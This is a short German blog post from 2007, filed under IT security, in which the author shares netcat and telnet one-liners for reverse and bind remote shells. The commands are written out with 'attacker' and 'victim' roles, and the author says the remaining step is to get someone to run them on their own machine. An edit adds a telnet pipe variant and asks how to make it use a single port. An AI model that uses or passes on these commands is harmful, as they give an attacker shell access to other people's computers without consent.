Remote-Shell
Hallo Leute,
Hab letztens ein bisschen mit netcat herumexperimentiert , und musste folgendes selber herausprobieren, weil ich kein passendes Paper fand, welches genau das erklärt hat
Man müsste es nur schaffen, irgendeinen das ausführen zu lassen ^^
——————————————————-
| — Reverse Connection: — |
Angreiffer:
nc -l -p 5110
EINEN SERVER AUF PORT 5110 STARTEN
Opfer:
nc -e /bin/sh 127.0.0.1 5110
EINEN CLIENTEN ZUM SERVER 127.0.0.1 (ANGREIFFER IP) AUF PORT 5110 VERBINDEN LASSEN, UND SHELL AUSFÜHREN (REMOTE SHELL)
| — Direct Connection: — |
Angreiffer:
nc 127.0.0.1 5110
EINEN CLIENTEN ZUM SERVER 127.0.0.1 (OPFER IP) AUF PORT 5110 VERBINDEN LASSEN
Opfer:
nc -l -p 5110 -e /bin/sh
EINEN SERVER STARTEN, DER NACH VERBINDUNGAUFBAU EINE SHELL STARTET (REMOTE SHELL)
————————————————–
Vielleicht brauchts ja einer
//edit:
Hab nochmal weiter experimentiert (weil ich Pipes so liebe xD) habe ich mir noch was mit Pipes überlegt. Und zwar nutze ich telnet dazu
Opfer macht folgendes:
telnet “127.0.0.1″ 50 | /bin/sh | telnet “127.0.0.1″ 51
Der “Hacker” hat dann einfach 2 Konsolen offen, mit folgendem:
sudo nc -l -p 50
sudo nc -l -p 51
Mit dem ersten werden die Kommandos geschickt, und das andere erhält die Rückgabe
Weiß vielleicht einer Zufällig, wie ich es verhindern kann dass ich 2 Ports öffnen muss? Also, dass die Rückgabe von Bash wieder zum gleichen Port Zurückgeschickt wird?
Sowas wie:
telnet “127.0.0.1″ 50 | /bin/sh | $1
und dieses “$1″ würde z.B. “telnet “127.0.0.1″ 50″ symbolisieren xD Kp irgendwie sowas.
If you enjoyed this article please consider staying updated via RSS. Links to your own social media pages could be added here.
This entry was posted on Sunday, August 12th, 2007 at 13:05 and is filed under IT Security. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.